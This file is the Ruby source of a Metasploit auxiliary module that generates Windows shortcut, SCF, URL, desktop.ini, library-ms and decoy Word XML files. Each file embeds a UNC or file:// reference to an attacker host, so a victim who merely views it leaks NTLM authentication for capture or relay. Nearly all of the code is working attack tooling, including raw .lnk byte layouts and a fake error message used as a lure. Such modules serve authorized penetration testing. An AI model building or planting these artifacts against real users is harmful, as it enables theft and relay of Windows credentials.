##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
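# Generates a Windows shell artifact (.lnk, .scf, .url, .xml, .library-ms or
# desktop.ini) whose icon / stylesheet reference is a UNC or file:// path on
# LHOST. When a user merely browses to the file, Explorer (or Word for the
# .xml variant) tries to fetch that resource and authenticates to LHOST, so
# LHOST should be running an SMB (and, for the file:// forms, WebDAV)
# listener that captures or relays the resulting NTLM exchange — for example
# a capture/relay server module.
#
# The artifact is written locally through the FILEFORMAT mixin's
# file_create; nothing is sent to a target by this module itself.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows SMB Multi Dropper',
        'Description' => %q{
          This module dependent on the given filename extension creates either
          a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes
          a reference to the specified remote host, causing SMB connections to be
          initiated from any user that views the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Richard Davy - secureyourit.co.uk', # Module written by Richard Davy
          'mubix', # Lnk Creation Code written by Mubix
          'asoto-r7', # Word XML creation code
          'hyp3rlinx', # .library-ms technique
          'bcoles', # Added .library-ms support
        ],
        'Platform' => [ 'win' ],
        'References' => [
          ['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],
          ['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],
          ['URL', 'https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        # OptAddress validates the value as an address, which is what keeps the
        # interpolation into the INI/XML bodies below from being an injection
        # vector. NOTE(review): a raw IPv6 literal is not a valid UNC host name
        # on Windows (it needs the ipv6-literal.net form) — confirm before relying
        # on IPv6 here.
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
        OptString.new('FILENAME', [ true, 'Filename - supports *.lnk, *.scf, *.url, *.xml, *.library-ms, desktop.ini', 'word.lnk']),
      ]
    )
  end

  # Picks the generator from FILENAME. desktop.ini is matched on the whole
  # basename; everything else on its extension. The match is case-insensitive
  # and requires the dot (the previous last-three-characters test accepted
  # names such as "foolnk"), and it no longer relies on ActiveSupport's
  # String#ends_with? alias. Anything unrecognised is a BadConfig failure.
  def run
    filename = datastore['FILENAME'].to_s
    basename = File.basename(filename).downcase
    return create_desktopini if basename == 'desktop.ini'

    case File.extname(basename)
    when '.lnk' then createlnk
    when '.scf' then createscf
    when '.url' then create_url
    when '.xml' then create_xml
    when '.library-ms' then create_libraryms
    else
      fail_with(Failure::BadConfig, 'Invalid FILENAME option')
    end
  end

  # Builds a Windows shell link (MS-SHLLINK) whose IconLocation string is a
  # UNC path on LHOST; Explorer resolves the icon when it displays the file.
  # The fixed byte layout (IDList for C:\AUTOEXEC.BAT, LinkInfo, relative
  # path, working dir, then a TrackerDataBlock) is kept byte-for-byte from
  # the original droplnk code; only the icon path is parameterised.
  def createlnk
    # Code below taken from module droplnk.rb written by Mubix
    lnk = ''
    lnk << "\x4c\x00\x00\x00" # Header size
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" # Link CLSID
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
    lnk << "\xdb\x00\x00\x00" # Link flags
    lnk << "\x20\x00\x00\x00" # File attributes
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Creation time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Access time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Write time
    lnk << "\x00\x00\x00\x00" # File size
    lnk << "\x00\x00\x00\x00" # Icon index
    lnk << "\x01\x00\x00\x00" # Show command
    lnk << "\x00\x00" # Hotkey
    lnk << "\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x7b\x00" # IDListSize
    # sIDList
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
    lnk << 'C:\\'
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
    lnk << "\x00"
    lnk << 'AUTOEXEC.BAT'
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
    lnk << "\x5b\x15\x14\x00\x00\x00"
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')
    lnk << "\x00\x00\x1c\x00\x00\x00"
    # sLinkInfo
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
    lnk << "\x00\x00\x00"
    lnk << 'C:\\AUTOEXEC.BAT'
    lnk << "\x00\x00\x0e\x00"
    # RELATIVE_PATH (14 UTF-16 units, matching the 0x000e count above)
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
    lnk << "\x03\x00"
    # WORKING_DIR (3 UTF-16 units)
    lnk << Rex::Text.to_unicode('C:\\')
    # ICON LOCATION
    # NOTE(review): 0x1c (28) is a hard-coded CountCharacters, but the UNC
    # string below is 11 + LHOST.length UTF-16 units, so the count is only
    # exact for a 17-character LHOST. Left as-is because the ExtraData bytes
    # that follow were laid out around it; verify against MS-SHLLINK before
    # switching to [path.length].pack('v').
    lnk << "\x1c\x00"
    lnk << Rex::Text.to_unicode(unc_path('icon.ico'))
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
    lnk << 'computer'
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

    file_create(lnk)
  end

  # Shell Command File: the [Shell] IconFile= entry is a UNC path on LHOST,
  # fetched when Explorer renders the directory listing containing the file.
  # Output is byte-identical to the original (no trailing newline).
  def createscf
    scf = [
      "[Shell]\n",
      "Command=2\n",
      "IconFile=#{unc_path('test.ico')}\n",
      "[Taskbar]\n",
      'Command=ToggleDesktop'
    ].join

    file_create(scf)
  end

  # desktop.ini for the folder it is dropped into: [.ShellClassInfo]
  # IconFile= points at LHOST, so opening the folder triggers the fetch.
  # Output is byte-identical to the original (no trailing newline).
  def create_desktopini
    ini = [
      "[.ShellClassInfo]\n",
      "IconFile=#{unc_path('icon.ico')}\n",
      'IconIndex=1337'
    ].join

    file_create(ini)
  end

  # Internet shortcut with two references to LHOST: the URL itself is a
  # file:// URL with a host component (resolved as a UNC/WebDAV path) and
  # the IconFile= entry is a plain UNC path fetched when the icon is drawn.
  def create_url
    url = [
      "[InternetShortcut]\n",
      "URL=file://#{datastore['LHOST']}/url.html\n",
      "IconFile=#{unc_path('icon.ico')}\n"
    ].join

    file_create(url)
  end

  # Windows Library description (.library-ms) whose <iconReference> is a UNC
  # path on LHOST; Explorer fetches it when the library is listed. The
  # remaining elements mirror a stock Documents library so the file is
  # accepted. The <ownerSID> value appears to be an arbitrary placeholder;
  # the <serialized> blobs are kept verbatim from the original.
  def create_libraryms
    xml = [
      '<?xml version="1.0" encoding="UTF-8"?>',
      '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">',
      '<name>@shell32.dll,-34575</name>',
      '<ownerSID>S-1-5-21-372074477-2495183225-776587326-1000</ownerSID>',
      '<version>1</version>',
      '<isLibraryPinned>true</isLibraryPinned>',
      "<iconReference>#{unc_path('icon.ico')}</iconReference>",
      '<templateInfo>',
      '<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>',
      '</templateInfo>',
      '<searchConnectorDescriptionList>',
      '<searchConnectorDescription publisher="Microsoft" product="Windows">',
      '<description>@shell32.dll,-34577</description>',
      '<isDefaultSaveLocation>true</isDefaultSaveLocation>',
      '<simpleLocation>',
      '<url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>',
      '<serialized>MBAAAEAFCAAA...MFNVAAAAAA</serialized>',
      '</simpleLocation>',
      '</searchConnectorDescription>',
      '<searchConnectorDescription publisher="Microsoft" product="Windows">',
      '<description>@shell32.dll,-34579</description>',
      '<isDefaultNonOwnerSaveLocation>true</isDefaultNonOwnerSaveLocation>',
      '<simpleLocation>',
      '<url>knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634}</url>',
      '<serialized>MBAAAEAFCAAA...HJIfK9AAAAAA</serialized>',
      '</simpleLocation>',
      '</searchConnectorDescription>',
      '</searchConnectorDescriptionList>',
      '</libraryDescription>'
    ].join

    file_create(xml)
  end

  # Word XML document whose xml-stylesheet processing instruction points at a
  # file:// URL on LHOST, so Word tries to fetch the XSL (over SMB/WebDAV)
  # when the document is opened. The visible text is just a decoy message.
  def create_xml
    xml = [
      "<?xml version='1.0' encoding='utf-8' ?>",
      "<?mso-application progid='Word.Document'?>",
      "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>",
      '<Text>',
      ' FATAL ERROR: The document failed to render properly.',
      '</Text>'
    ].join

    file_create(xml)
  end

  private

  # UNC path \\LHOST\name shared by every generator; LHOST is an OptAddress,
  # so the interpolated value has already been validated as an address.
  def unc_path(name)
    "\\\\#{datastore['LHOST']}\\#{name}"
  end
end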